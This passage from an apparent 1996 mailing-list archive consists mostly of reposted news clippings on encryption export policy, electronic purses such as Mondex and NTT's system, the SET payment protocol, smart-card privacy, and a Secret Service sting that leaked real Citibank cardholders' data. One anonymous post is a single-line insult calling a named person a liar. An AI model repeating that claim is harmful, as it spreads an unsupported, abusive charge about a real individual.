Merrill Lynch is following the lead of financial institutions such as Citibank in offering its retail customers an online service with a wide range of uses -- from stock quotes and other financial information to direct orders to financial consultants. But instead of making the online service available on popular online networks, Merrill Lynch plans to maintain control over its customers' data. "You really don't want to allow sensitive data to pass across the Net without the development of some real security safeguards," says Sorgen. Just down the block from Merrill Lynch, American Express is taking a slightly different tack. It, too, is focusing on technology integration, but American Express wants to create a global platform that is both easy to use and scalable. American Express already has invested heavily in its ExpressNet and is focusing on developing a World Wide Web site for its small-business customers. In late July, it announced a joint venture with Microsoft to develop a travel service on the Internet (IW, Aug. 5, p. 35).

Channel Change

CIO Allan Loren says American Express is focused on two main goals: reengineering the company and helping to deliver new products. "We're changing distribution channels," says Loren, emphasizing the use of the Internet in helping distribute new products and expand the transactional capabilities of the company. Nearly half of IT expenditures at American Express is going toward reengineering and new product development, Loren estimates, and about 40% is being used to maintain its technology operations. The rest is being used to determine new directions for the company in a highly charged and competitive business environment. For other financial services companies, the technology challenge has been to find expanded use for data and consequently develop a broader range of products, says Equifax president McGlaughlin.
Investment in technology at Equifax is related to moving away from mass-marketed, commodity information to more customized information solutions, he says. The company also is attempting to create more real-time data. Its data gatherers use notebook computers to record and transmit data, and the company plans a major investment in parallel processors to handle the bigger volume of data it hopes to soon generate. Three years ago, all of Equifax's data was stored in mainframes, available only to Equifax technical staff. Now, says McGlaughlin, with the mainframes replaced by servers and networked PCs, nearly two-thirds of the data is at customer terminals. "We're much closer to the leading edge now," he says. "New technology has allowed us to free up our resources and devote more of them to developing applications rather than storing data." Too often in the past, technology investment has meant large computers and proprietary software, resulting in systems that didn't allow enterprisewide use of technology. The front and back offices remained separate entities. Now, with the expanded availability of application software -- ranging from enterprise resource planning to object-oriented databases -- it has been possible to gradually merge the front and back offices and give users more data and more tools with which to use data. The result, industry executives say, isn't simply improved productivity but also sharply reduced costs to the entire enterprise.

Reuters: Wednesday, September 11, 1996
Industry Groups Lobby for More Encryption Exports
By Aaron Pressman

A broad coalition of corporations went to Capitol Hill on Tuesday to lobby in favor of relaxed export restrictions on computer encoding technology. On Thursday, the Senate Commerce Committee will mark-up the Promotion of Commerce Online in the Digital Era Act of 1996 known as Pro-CODE, a bill that would abolish most export restrictions.
Under a Cold War-era munitions statute, only weak encryption programs created in the United States can be sold abroad, although domestic use of encryption is not regulated. Companies in the high-tech industry argued they are losing business to foreign competitors who are not bound by U.S. export restrictions. And multinational companies in other industries said the restrictions hamper their ability to conduct business overseas. "We are at a competitive disadvantage vis-a-vis our foreign competitors and that is an unacceptable situation," Gregory Garcia, director of international trade affairs for the American Electronics Association, said at a press briefing here. The Pro-Code bill, sponsored by Republican Senator Conrad Burns of Montana, Democratic Senator Pat Leahy of Vermont and others, has bipartisan support in the Commerce Committee. "We support the Burns bill because it does enable companies to utilize encryption technology securely which is vital if we're going to compete in a very tough global marketplace," Victor Parra, president of the Electronic Messaging Association, said. The association represents companies that rely on electronic communications, including Exxon Corp, Citicorp and Boeing, Parra said. Encryption programs use mathematical formulas to scramble information and render it unreadable without a password or software "key." Earlier this week, Senator James Exon, the Nebraska Democrat, came out against the current bill in a letter to Commerce Committee chairman Sen Larry Pressler. Exon will likely offer amendments at the mark-up, an aide to the senator said. The Clinton administration opposes the Pro-CODE bill, arguing that export of encryption technology would hamper law enforcement and intelligence gathering operations. The House Judiciary Committee will hold a hearing on a similar measure on September 25.
Financial Times: Thursday, September 12, 1996
Japan on the Fast Track for the Electronic Purse
By William Dawkins

LONDON-- Japan yesterday belatedly joined the international race for a cashless society, when Nippon Telegraph and Telephone, the telecommunications giant, unveiled what it claims will be a secure yet confidential electronic purse that could be used by any bank account holder. The electronic money system, developed with the help of a think-tank attached to the Japanese central bank, aims to provide consumers with a "smart" card which would be used to buy goods and services in shops, vending machines or over the Internet and could be topped up by being plugged into a cash dispenser or telephone. In common with some other systems, the Japanese version would also give customers personal digital signatures, to stem fraud. Smart cards contain computer microchips - rather than the magnetic strip that has become the industry standard - which enable them to be used not only to carry out financial transactions but also to store data. The NTT card is similar to other electronic purses, such as the one being tested by Mondex, a UK-led global consortium of 17 banks, which has run a trial of its card in Britain for more than a year. The market for electronic purses is being contested by global credit and charge card organisations Visa, MasterCard and Europay, which are all holding trials of their own cards. What NTT claims is unique about its plan is that it envisages the establishment of a digital central bank, which would issue electronic cash on the cards to customers in co-operation with the retail banks where they hold accounts. The aim, said Mr Hiroshi Yasuda, an NTT executive, is to enable participating banks to issue compatible electronic purses, thus avoiding the competition over technical standards which has dogged other systems. Mondex, for example, does not comply with technical standards for chip cards set by Europay, MasterCard and Visa.
Some critics of Mondex say it will falter internationally because of this non-compliance. However, Mondex says standards are important only in that card-users and retailers do not want to have multiple point-of-sale terminals to accept the cards. Understandably, NTT wishes to retain technical mastery of the system, which is why it has applied for a Japanese patent for the computer software that would enable the digital central bank and private sector banks to operate together. Electronic purse operators across the world say that it will take at least a decade for consumers to make the switch in large numbers. The change is likely to take longer in Japan, where consumers and companies favour paper money. Most small and medium-sized companies still pay suppliers in paper, delivered in person. Banks refuse to set up standing orders. Cash is instead sent by post. Credit and charge cards are not widely accepted. The average citizen's wallet bulges with cash, not cards. The NTT proposal is the strongest of several rival and incompatible Japanese experiments, carried out by the Ministry of International Trade and Industry and the Ministry of Posts and Telecommunications. NTT will ask the ministries to adopt its system, to pave the way for a single standard cashless nation.

William Dawkins

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From dlv at bwalk.dm.com Wed Sep 18 00:12:15 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 15:12:15 +0800
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <7VJFuD100w165w@bwalk.dm.com>

Los Angeles Times: Monday, August 26, 1996
Credit Sting Involves Hacker And Citibank Cardholders
By JIM NEWTON, TIMES STAFF WRITER

When U.S. Secret Service agents set a trap for a young computer operator who had expressed an interest in stealing credit information, they baited it well: with real credit card numbers from real customers.
The young man, Ari Burton of Las Vegas, went for it, was arrested and was charged with possession of stolen credit information--charges to which he ultimately pleaded guilty. That ended the case against Burton, but the cardholders' information did not stay secret with the Secret Service. Detailed credit histories of 35 Citibank cardholders, none of whom gave their permission for their files to be accessed, ended up with the defendant, his lawyers and anyone else who got a copy of the case file. Included in it: names, addresses, home phone numbers, Social Security numbers, credit card numbers, available credit lines and outstanding balances--more than enough for anyone to run up huge tabs on unsuspecting customers. The cardholders were never warned that their information had been used in a sting, or that it had subsequently been shared with the defendant and others. In fact, a few of the cardholders only learned of the disclosure when the defendant's father wrote asking whether they had authorized the release of the information. Others found out just last week, three years after the information was first released, when contacted by The Times. Told of their unwitting involvement in a federal sting, many were furious. "I'm upset, I'm real upset," said Joe Becker of Costa Mesa. "I want to know how this happened." "I never authorized anything like that," said Sarah DiBoise, who lives in Atherton. "I am certainly bothered by it." And Sam Zadeh, who lives in New York, deplored what he called the "bank and law enforcement agency invading our privacy." The same revelations that left cardholders smoldering also raised troubling questions about the conduct of the government and of the bank that released private information to the Secret Service. 
Some of those questions ripple into delicate areas of criminal law--topics such as the right of defendants to evaluate evidence against them and the right of uninvolved citizens to maintain their privacy while federal agents try to corral bad guys. Why, lawyers, cardholders and others asked, would the Secret Service use real cardholder information for sting operations? And even if, for legal reasons, it feels compelled to use actual credit histories, why not seek permission from cardholders first? Finally there is this question: How many cardholders nationally are exposed to disclosure of their credit information through government operations? Authorities in some other parts of the country say they do not use real credit information, and Citibank stresses that the Burton case was an aberration. But investigators and prosecutors in Las Vegas said the techniques used to nab Ari Burton are employed in other instances. In fact, Secret Service agents in Las Vegas say the use of real credit information is forced upon them by federal law requiring authorities to demonstrate that a suspect actually possessed something illegal in order to win in court. "In something of this nature, the crime is the illegal obtaining of what is called the access device," said Jerry Wyatt, assistant special agent in charge of the Secret Service office in Las Vegas. "Unless the access device is a real number, it's just a number." Following that theory, some authorities argued that if the Secret Service had supplied Burton with fake credit card information, Burton could not have been found guilty of attempting to steal real credit card histories. But that reading of the law is hotly contested by experienced lawyers. Although it is a violation of federal law to have unauthorized possession of an access device--another name for a credit card number--it also is against the law to attempt to possess such a device, even if that attempt turns out not to be successful. 
Legal experts said agents could make up fictitious customers and generate false credit histories, then use that information in sting operations. Even without a handoff of real credit information, prosecutors still could charge the objects of the stings with attempting to steal credit card numbers, an approach that might slightly complicate criminal cases but that would protect cardholders. Wyatt said he was not familiar enough with the facts of the Burton case to know why that approach was not adopted. Nor could he say how many cases each year involve the knowing transfer of actual credit information from the government to criminal suspects--only that such cases are not unusual. At the U.S. attorney's office in Las Vegas, the chief of that office's criminal division agreed that other tactics might have minimized the risk to cardholders in the Burton case, but he said the Las Vegas office typically uses real credit card numbers of actual cardholders in luring suspects such as Burton. "We're sensitive to disclosing too much personal information," said John Ham of the U.S. attorney's office. "But whenever we charge credit card cases, we include names and numbers." As for its role, Citibank acknowledged releasing the files to the government but defended its actions by saying it meant no harm and by stressing that its customers' privacy is its highest priority. "We would never do anything to jeopardize our customers," said Maria Mendler, a spokeswoman for the bank, which has a reputation for vigorous protection of its cardholders' privacy. She acknowledged that real information was supplied in the Burton case, but she said the bank did not intend for that information ever to surface in a court file or otherwise become available to the defendant and others. In 1993, the bank also defended its actions in a letter to a lawyer by noting that while information had been released, it had not been done to hurt anyone. 
"We submit that the actions as alleged do not include the requisite element of an intention to do harm to those customers whose information was disclosed," an associate general counsel for Citibank wrote at the time. Those explanations hold little sway with Citibank customers, however, many of whom complained that if their personal credit histories were going to be used in a sting operation, they at least deserved to be notified so that they could apply for new card numbers once the operation was over. Instead, sensitive information about them and their credit has been kicking around a court file for more than three years--available to, among others, Burton, a man who has admitted that he tried to steal credit information. There is no evidence that Burton or anyone else used the card information gathered in that case to ring up bills, but that, too, is little comfort to the cardholders. "Financial information is private, and I have a right to privacy," said Becker, one of those whose credit information was used by the Secret Service. "I'm worried about how this information might be used now that it's out there." Experienced defense and civil rights lawyers, who are used to analyzing government conduct and subjecting it to harsh scrutiny, said they were taken aback by the actions of the Secret Service and Citibank in the Burton case. "I would think these people could sue for invasion of privacy," Century City defense lawyer Harland W. Braun said of the cardholders. Paul Hoffman, a Los Angeles civil rights lawyer, said he too was surprised by the use of private information in a sting. "It does seem amazing to me," he said. "These people have rights, too." Legal experts with both defense and prosecution backgrounds acknowledged that problems might have confronted the Secret Service had it tried to avoid offending customers by fabricating card numbers or inventing fake credit histories. 
But they said those problems probably could have been overcome, and added that in any event, they did not pose enough of an obstacle to justify accessing credit information without permission. "The answer to that is you get real people who are willing to have their credit cards used that way," said Hoffman. "If you're doing a sting in a house, it doesn't mean you go into a neighborhood and take a house. Why should this be different?" Complicating the issue still further is a decision by the prosecutor in the case. Once the Secret Service and Citibank had used real credit histories to bait the trap for the sting, the U.S. attorney in Las Vegas was presented with a case in which the evidence against the defendant involved personal information whose disclosure might harm innocent citizens. That type of situation can pose a difficult dilemma for a prosecutor: Federal rules require that prosecutors share evidence with their defense counterparts so that defendants know what they might face at trial, and failing to do so can allow suspects to go free. On the other hand, disclosing the information might put other people at risk. In general, careful prosecutors tend to err on the side of providing information to the defense even if it may create hazards for others. In the Burton case, however, some experts argue that the privacy rights of the cardholders should have outweighed the defendant's right to confront the specific identifying information; an edited list of cardholder information should have sufficed in a case such as this one, they said. The solution, according to those experts, would have been for prosecutors to ask the judge to impose a protective order that would have shielded the personal, private information from either the defense lawyer or from the defendant himself. 
But others maintain that Burton's lawyers were entitled to the information because it was evidence against Burton, and therefore evidence that his lawyers had a right to assess and consider in deciding their legal strategy. Ham, the chief of the Las Vegas office's criminal division, echoed that view, saying his office had no choice. "We have to provide documents that support the charges," he said. If prosecutors had not done so, he added, a judge undoubtedly would have forced them to. Ham said no protective order was sought to keep the information from being shared with people other than the defense lawyer. The prosecutor, said noted Los Angeles defense lawyer Donald Re, "probably had the obligation to provide the material in discovery." Re added, however, that a protective order might have been tailored to allow Burton's lawyers to review the material on the condition that they not share it with anyone else, including their client. Because there was no such order, Burton effectively received the same information in discovery that he had sought illegally. Within a month of being arrested, the same government that was charging him with a crime provided him with the list of cardholders and their personal information. "They handed it right back to me," Burton said in an interview. At the same time, Re and others stressed that the prosecutor's decision was a close call and difficult to second-guess. Far more troubling, they said, were the actions that led to it: the bank's disclosure of the material and the Secret Service's decision to hand it over to a suspect. And given the statements by investigators and prosecutors that the techniques used in the Burton case are widely practiced in other investigations, many experts warned that ill-advised government practices may be putting cardholders across the country at risk. "There are a lot of situations where they create a scenario like this where you want to show actual possession, not just an attempt," said Re. 
"But in those situations, you get consent from somebody. You have a security officer who sets up an account, and you use that account number in the sting. Then there's no harm, no foul.

"But you don't give out real information," Re added. "That's just crazy."

USA Today: Wednesday, August 28, 1996
Citibank Tightens Rules on Disclosure to Law Enforcement
By Jeff Mangum

Stung by a sting that nabbed a Las Vegas man for possession of stolen credit information, Citibank says it has changed how it works with law enforcement agencies. Citibank agreed in 1993 to give the U.S. Secret Service credit card information on 35 customers, without their knowledge, to help catch a man who eventually pleaded guilty. Customers' names, addresses, home phone numbers, Social Security numbers, credit card numbers, available credit lines and outstanding balances ``ended up with the defendant, his lawyers and anyone else who got a copy of the case file,'' the Los Angeles Times reported Monday. ``Citibank trusted that the criminal justice system would keep this information safe and confidential,'' the bank said Tuesday. ``As it turned out, that was a mistake.'' Citibank says a relative of the defendant subsequently contacted the affected customers, asking them to join a class-action lawsuit against the bank. That, spokesman Mark Rodgers says, prompted Citibank to contact the customers and change its policy in 1993. ``Were we to consent to a similar operation (now), for example, we would only do so with the express consent of that customer,'' Citibank said Tuesday. Federal law generally prohibits disclosure of financial records. But there are exceptions. ``The general rule of thumb is there has to be a subpoena or a person's consent,'' says Mitch Montagna, a spokesman for AT&T Universal Card. The American Bankers Association says ``99.9% of the time, customer information is safe and secure.''

Denver Post: Tuesday, September 10, 1996
Editorial
U.S. Invades Privacy in Nevada Credit-Card Sting

Americans who say they worry about invasions of their privacy have a new reason to fret: In a recent case, the federal government and a major bank willingly gave a suspected crook the credit card numbers and personal histories of citizens -- without their permission or knowledge. The breach of privacy in this Las Vegas, Nev., case was egregious and outrageous. The Clinton administration should reprimand the agents involved, and Congress should amend the laws so that such an affront to citizens' rights never reoccurs. In the case, U.S. Secret Service agents wanted to snare a computer operator who had expressed interest in illegally obtaining credit-card information. They asked Citibank for the names, addresses, Social Security numbers and other credit information on some of the bank's card holders. Citibank complied with the request - but never got the card holders' permission to divulge such personal information, according to a story in the Los Angeles Times. In other words, law enforcement agents handed a suspected credit swindler the very information he would need to carry out a crime. The suspect ultimately pleaded guilty to some of the charges. Many of the card holders heard that their personal records were used to bait a credit-card sting only when the defendant's father contacted them. Others learned about the episode through a newspaper reporter who was covering the case. In theory, there are laws to protect consumers from people prying into their credit histories without their permission. Obviously, these statutes aren't nearly strong enough.
American Banker: Monday, September 16, 1996
FUTUREBANKING
Mondex, Moving Fast, Sees Long Trek To a Worldwide Cash Alternative
By JEFFREY KUTLER

Exactly a year passed between the start of the Mondex trial in the southwest England town of Swindon and the creation of Mondex International, the banking consortium that hopes to use the smart card system as the basis for a global alternative to cash. That was fast according to the calendar. It was also an eternity. During those 12 months, National Westminster Bank, the new payment technology's inventor and champion, rode a roller coaster between self-congratulation and a skeptical press, between the celebration of an unprecedented accomplishment and a storm of criticism from within its own industry. Even with the formation July 18 of Mondex International, enthusiastic backing from banking powers as diverse as Wells Fargo Bank and Hongkong & Shanghai Banking Corp., and the current cloning of Swindon in the Canadian city of Guelph -- it relates locationally to Toronto as Swindon does to London - the Mondex eternity continues. The emotional pendulum still swings at Natwest Group headquarters in London. And emanating from Natwest and from within the Mondex project is a mix of messages that underscores how truly groundbreaking is their attempt. Win or lose, whether or not they are understood or praised by their peers, the founders of the Mondex project have risen above the almost weekly cycles of technological change and quarterly pressures on earnings with a longer-term perspective antithetical to the traditional ways of bankers and the banking industry. "Natwest recognizes that Man does not live by short-term profits alone," group chief financial officer Richard K. Goeltz said in a recent interview with American Banker. "There are things we have to bequeath to our successors." Mr. Goeltz -- who moved to New York this month as chief financial officer of American Express Co.
-- and others close to Mondex want the world to recognize how far they have come in a year. But the Mondex promoters are quick to point out that it is actually Year 6 since Natwest began to fund them. Today they look at a 10- or 15-year horizon. (Natwest will recover most if not all its development cost by issuing about $150 million of stock in Mondex International. The bank expects to collect further royalties as the system rolls out. Partner bankers do not begrudge Natwest its return for risk taking.) One gets the sense that Natwest's leaders were so well primed for the long haul that it would take more than a few technical glitches and negative newspaper stories to get their goat. Mr. Goeltz dismissed the sniping from more tradition-bound competitors as "slings and arrows" that never hit their mark. Mr. Goeltz and other insiders knew, long before the Mondex International membership roster became public, that the concept was attracting interest. "Broad-scale cooperation" was a prerequisite, written into Natwest's business plan, and 16 other "global founders" who came forward July 18 found the case compelling enough to want to join in the marathon. "This is a process of change management - it's not like flicking a switch," said Roy S. Pratt, deputy chief general manager of Mondex UK Ltd., the British franchise co-owned by Natwest and Midland Bank Ltd. "Our job is not to say, 'This is how it will be.' It is about trends and responsiveness. To say anything is cast in stone at this point would be presumptuous." Mr. Pratt, 49, spent 31 years at Midland Bank before being "seconded" to Mondex UK in 1994. His banking jobs were in treasury, asset/liability, and portfolio management. He said his nontechnological background enabled him to see the complexity of the phenomenon, to confront necessary questions about the known and unknown quantities of a reinvented payment system. 
"People always want to ask about take-up (acceptance) rates, how fast this will happen, but I am reluctant to make blanket statements," Mr. Pratt said. "Mondex will mean different things to different people. It will not be the same at Exeter University (where it is being introduced this fall) as it is in Swindon. "There is not one proposition or growth rate. What is a critical mass for one segment will be different in another. A carpark will not be the same as a bus. You might call each a micro-Mondex economy. "This is a change process that will be based on value exchange on a just-in-time basis," Mr. Pratt continued. "It is not a product like a loan or deposit package, or even a payment mechanism. It is not mono-dimensional. "And it's not just an issue for bankers. We respect the integrity of the payments process, but we also have a responsibility to society." Such words are hardly bankerly. To be sure, Mondex has rigorous underpinnings. The bankers' thought processes are logical. The strategic plans passed muster with "some of the most sophisticated, hard-nosed bankers in the world," Mr. Goeltz said. "Mondex does have tremendous social implications, not least in terms of what it can do for welfare payments and pensions," Mr. Goeltz said before his recent departure for American Express. By automating cash "it reduces friction in the economy. "But the implications for society were not the motivation for Mondex. It was to serve customers better and generate a return for shareholders. "What's interesting about Mondex was not the technology," Mr. Goeltz went on. "The technology was a facilitator. This is one of the few products I've seen in which all three participants in the value chain -- banks, retailers, and customers -- benefit." The enthusiasm carries over to outsiders - even some who have been lumped among the critics - to a point. "The richness, the robustness of the technology, is fantastic," said H. 
Eugene Lockhart, president and chief executive officer of MasterCard International. (MasterCard held negotiations with Natwest to buy into or participate in Mondex, but at the same time its European affiliate, Europay International, was developing the competitive Clip electronic purse system.) For more than two years, Mr. Lockhart has insisted on seeing smart cards' "business case," and even as MasterCard launches experiments around the world he is still not completely satisfied. "Let's assume there is a business case," he said. "The opportunity is that we have this new technology platform that can do a lot of things, stored value being only the first manifestation. "But there is a big problem: How on earth do you grow that system in millions of other cases just like Swindon?" Swindon, for now, is "the case." Mondex UK's overly optimistic projection of 40,000 cardholders in the city of 190,000 people set off the bad press. In reality, the 10,000 that signed up within 12 months weren't bad news at all. That's almost 25% of the combined Natwest-Midland customer base in the area. Mondex said its surveys showed 66% of the cardholders said they preferred Mondex to cash. Average card loads were the equivalent of $35 to $45, and the majority of transactions were under $7.50. Perhaps more to the point, it is hard to find a storefront, public phone, or any type of payment device in the commercial center of Swindon that does not accept Mondex. The banks signed 600 merchants, double the number accepting MasterCard and Visa, which stands to reason for a cash replacement. "You can actually go cashless," said Mark Gordon, Mondex International's head of marketing. "It's not a big deal when you present Mondex at the tills." While Mondex has been selective in its data disclosures -- no one denies that its transactions are a small percentage of the Swindon total -- Mr. Gordon and his team have been more than hospitable in letting the world come view Mondex. 
Banker delegations are commonplace, often gathering at the "Mondex Store" in the town center before setting out to observe and test merchant acceptance. Hardly a day goes by without the visit of a television crew. Many come from Asia, where Mr. Gordon believes "Mondex will really fly." (A Hong Kong pilot is set for late this year, and smart cards of various kinds are already prevalent in Singapore, Taiwan, and elsewhere in the region.) "They see this as a city of the future," he said, "like something out of 'Blade Runner.'" The Mondex staff tries to keep the visits unobtrusive, but some of the merchants were willing to pay the price of unanticipated stardom. "Our town center store is small," said Bob Upshall, manager of the Sainsbury supermarket, part of one of Britain's biggest chains. "Having Mondex raised our profile and provided a morale boost." At the corporate level, Sainsbury was eager to participate in Mondex because "it didn't want to be left behind." So the smaller, convenience-oriented Swindon outlet, which otherwise might have relied for years on older computers and point of sale equipment, got an upgrade on a par with many "superstores," and Mr. Upshall said, "My staff loved it. A positive staff is a plus for customer take-up." Sainsbury, a Midland Bank customer, invested 45 minutes per cashier in Mondex training and found the system was so easy to grasp that it didn't have to deploy, as anticipated, demonstrators in the checkout lanes. Mondex volumes were running at less than 0.5% of sales at the three Swindon stores -- slightly lower in the town center location than at the larger branches on the outskirts of town. Mr. Upshall said an incentive offer in May and June of a five-pound voucher (about $7.50) for every 50-pound ($75) shopping trip brought in transactions well above the average ticket of five pounds in-town and 30 pounds ($45) elsewhere. "Whether smart cards will be in Mondex or other forms, they are here to stay," Mr. Upshall said. 
He gauged customer reaction as "very positive," though mainly among early adopters. He himself likes Mondex as a consumer -- "I use it in the canteen all the time" -- and as a merchant, because it streamlines the cash-handling tasks that require two to three full-time positions in the supermarket's back office. Nearby in McElroy's, a local department store, Vince Ayris accepts and encourages Mondex payments at his shoe repair and key-making stand. Mr. Ayris has been in the business 17 years, is a well-known man about town, and so strongly believes in Mondex that he essentially sold it to the local rugby club, where "we use it quite a lot. I find I'm more careful about spending money (with Mondex) than with cash, and it's easier than small change." Mr. Ayris admitted to being "a bit skeptical at first," but he has become so strong a booster that Mr. Gordon felt he had to deny that Mr. Ayris is in Mondex's employ. "I don't give money away to a bank like I do with a MasterCard or Visa discount," the merchant said. "There is no problem with fraud or counterfeit. "I have more over-ring errors on the till than on Mondex terminals. Every transaction is documented so disputes are more easily resolved" than with cash. And because the Mondex terminal is smaller than a cash register, "I have more room for selling product." Mondex is also proving itself at a multiplex movie complex, part of the MGM chain that Virgin Enterprises recently acquired. John Keil, the manager, said he "needed no convincing" to accept Mondex at every point of sale. "We saw the benefit immediately. Any way at all to take cash out of the system, the better. "The bigger the business, the more problem cash is," Mr. Keil went on. "Any major company sees the benefits in the technology." Like the supermarket, the MGM outlet easily won staff support. "Most of them are into gadgetry," Mr. Keil said. It also encouraged sales by cutting Mondex users' ticket price to about $4.90 from $6.80. 
The transactions are still a small portion of the 30% of in-person box-office sales done on plastic cards. (Another 30% are advance sales by phone; Mondex has not yet been accepted that way.) Mr. Keil said he is looking forward to having "one box" that can accept all cards. Even so, he said Mondex was "very flexible, requiring no change whatsoever to our system. It was slotted right in ... They made their system fit ours." "I think the system will take off eventually," Mr. Keil said. His only regret is that because he doesn't live in Swindon, he can't use Mondex more than he does. It is as if Mondex has succeeded at recruiting its merchants as change agents. Time will tell if they are still on board when Mondex begins costing them something. "The chip brings a fundamental change," said Mr. Pratt of Mondex UK. "You feel as if you are shaping the future. "When the market begins using it to create its own needs and to solve its own problems, that's when the real thrill will come -- and a surge in usage."

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From nobody at replay.com Wed Sep 18 00:38:56 1996
From: nobody at replay.com (Anonymous)
Date: Wed, 18 Sep 1996 15:38:56 +0800
Subject: A daily warning regarding Timothy C. May
Message-ID: <199609180341.FAA02454@basement.replay.com>

Timothy C. May is a lying sack of shit.

From dlv at bwalk.dm.com Wed Sep 18 00:53:40 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 15:53:40 +0800
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID:

AP Online: Sunday, September 15, 1996
Card Raises Privacy Issues
By PATRICIA LAMIELL

Big Brother is not watching. Or is he? Fears resembling those of the omniscient machine that spies on people in their homes in George Orwell's novel, ''1984,'' have found their way into a new technology entering the marketplace -- smart cards. 
These credit cards embedded with computer chips can store information from shoe size to credit history. But critics claim these cards will be used to compile dossiers on the people who use them. And now it's up to the Smart Card Forum, a family of companies driving development of smart card technology, to convince the public that Big Brother isn't watching, for smart cards are protected and confidential. ''There's a huge amount of misunderstanding, and that creates a huge amount of fear, about whether these products are going to decrease people's privacy or otherwise leave them unprotected,'' said John Burke, the forum's attorney and a partner at the law firm of Foley, Hoag & Eliot in Washington, D.C. Starting Monday in San Francisco, members of the Smart Card Forum will meet to discuss the latest technology and marketing programs necessary to put a smart card in every household. In many ways, smart cards resemble credit and debit cards that the market has grown accustomed to using. With a simple swipe, they too can substitute cash when buying everything from subway tokens to clothing and the purchase price is electronically deducted from the card using a special machine. But the smart card takes the technology further, embedding a computer chip into the card that gives it much more memory and enables it to do simple math and process information, like keeping a bank balance or tracking frequent flier miles. The huge potential scope of the smart card has prompted some concerns about the privacy rights of users. By tracking small purchases, telephone and transportation records, they can document a person's everyday movements. That information could be useful to everyone from employers and family members to law enforcement officials and banks. Marketers might be very interested in records of purchases made with smart cards. But privacy experts question whether third parties should gain access to see such information. 
The American Civil Liberties Union of New Jersey is fighting a state proposal to encode fingerprints on smart card drivers licenses on the premise that it would treat as criminals people who are not suspected of a crime. ''We also oppose the requirement that other data be included'' on New Jersey drivers licenses, said David Rocah, an ACLU staff attorney in Newark, ''unless precautions are made to insure that third parties will not have access to that data.'' Others, however, counter the questions of privacy, claiming that owners can control what information goes onto them and with whom it is shared. They also point out that the information is electronically scrambled, or ''encrypted,'' making it very difficult to steal. The Smart Card Forum is working to create privacy guidelines that can keep pace with the fast-developing industry. Federal regulators, such as the Office of the Comptroller of the Currency, the Federal Reserve and the Federal Deposit Insurance Corp., are all considering whether and how to regulate smart cards. Smart cards are a huge business for companies like Texas Instruments Inc. and Motorola Inc., which make the chip. They could also be a boon for banks and other financial institutions that issue the cards for a fee, and for payments-systems networks like Visa and MasterCard, which earn a percentage of each transaction. ''This is a huge, huge market,'' said Peter Hill, executive vice president for technology at Visa International, one of the 225 corporate members of the forum. ''Cash transactions world-wide total about $8 trillion a year, of which 80 percent are for $10 or less.'' A number of big banks have run pilot programs to test consumers' acceptance of the cards. Some have teamed up with Visa and MasterCard to do market tests in Swindon, England, Canberra, Australia, and at the 1996 Summer Olympic Games in Atlanta. A test is planned by MasterCard, Visa, Chase Manhattan Corp. and Citicorp, in New York's Upper West Side later this year. 
So far the pilot projects, which have put about 50,000 smart cards in circulation worldwide, have had mixed results. Many worry consumers will not incorporate the cards into purchases they now make with cash, and that has left merchants wary about the cards also. To move beyond the arena of small purchases, members of the Smart Card Forum are developing technology to allow people to use home computers to pay for Internet purchases with these cards, and to download cash onto a smart card. Personal-computer makers have begun including chip readers in PCs for these purposes. Also in development are scores of non-financial applications, such as keeping drivers license and medical information, transferring government welfare or medical benefits, and making airline and hotel reservations. To Diane Wetherington, MasterCard's senior vice president for smart cards, the Forum's biggest task is not the social and legal issues surrounding the smart card, but getting consumers to use it for any and all financial transactions down to the 10-year-old's weekly allowance and merchants to accept it. ''The technology works, the product works,'' she said. ''Now it is up to the marketing associations and companies to really try to create global products from these.''

American Banker: Monday, September 16, 1996
FUTUREBANKING
SET a Big Win for the Card Associations
By JEFFREY KUTLER

Whether for superstitious reasons or just to avoid the inevitable groans, experts in data security were long reluctant to use a certain, pertinent pun. But now it can be officially uttered: SET is set. Secure Electronic Transactions, the Internet payment protocol hashed out by MasterCard, Visa, and a sometimes unruly bunch of technology providers, went up on the card associations' Web sites in June in what was labeled as its final form. In other words, the standard was ready for prime time. Software developers could begin incorporating it in systems being designed for electronic transactions. 
And thus began something of a race to make SET-secured card payments a reality, at least in a test mode, by yearend. The principals were too busy and running too fast to celebrate their hard-won accomplishment. There was far more work to be done, and in their haste to get to it they may never have adequately explained the document's true significance. The SET advocates met their objective. Getting past their internal divisions, they wrote specifications for on-line credit card transactions and were unanimous in their endorsement. Relying on data encryption and digital certification of buyers, sellers, and bank processors, they erected several barriers to electronic thievery. They did not make the Net safe for all commercial and monetary activity. Nor did they silence a number of critics who still raise warning-flags about the Internet's inherent vulnerabilities, even those addressed by SET. The development of the protocol was well-chronicled. Probably too well from the standpoint of MasterCard and Visa, which had hoped that their mid-1995 move to cooperate -- on the assumption that payment security should not be a competitive venue -- would lead to a rapid conclusion of amicable, low-profile deliberations. The diplomatic initiative derailed in the fall of 1995 when Microsoft Corp., sitting on Visa's side of the table, failed to reconcile with the opposing camp that included two of Microsoft's market adversaries, International Business Machines Corp. and Netscape Communications Corp. After a couple of months of fence-mending, the negotiations were declared back on track Feb. 1. Within a month the working draft of SET was completed, supposedly drawing the best features from the initially separate MasterCard and Microsoft-Visa proposals. As the June deadline approached, most of the organizations directly involved in SET -- they included GTE Corp., Science Applications International Corp. 
